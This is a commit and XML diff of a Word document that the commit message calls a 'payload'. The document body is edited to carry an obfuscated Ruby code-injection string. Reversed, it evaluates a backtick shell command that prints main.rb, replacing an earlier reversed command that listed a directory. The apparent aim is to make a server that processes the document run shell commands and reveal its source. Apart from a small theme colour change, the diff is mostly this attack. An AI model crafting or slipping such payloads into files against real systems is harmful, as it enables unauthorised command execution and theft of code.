<commit_message>
Fix minnor bug and update payload tt.docx
</commit_message>
<xml_diff>
--- a/tt.docx
+++ b/tt.docx
@@ -18,17 +18,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>val(</w:t>
+        <w:t>eval("`br.niam tac`"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36,8 +26,10 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>‘]sl[x%’.reverse</w:t>
+        <w:t>.reverse</w:t>
       </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -395,7 +387,7 @@
   <a:themeElements>
     <a:clrScheme name="Office">
       <a:dk1>
-        <a:sysClr val="windowText" lastClr="31363B"/>
+        <a:sysClr val="windowText" lastClr="2E3436"/>
       </a:dk1>
       <a:lt1>
         <a:sysClr val="window" lastClr="FCFCFC"/>

</xml_diff>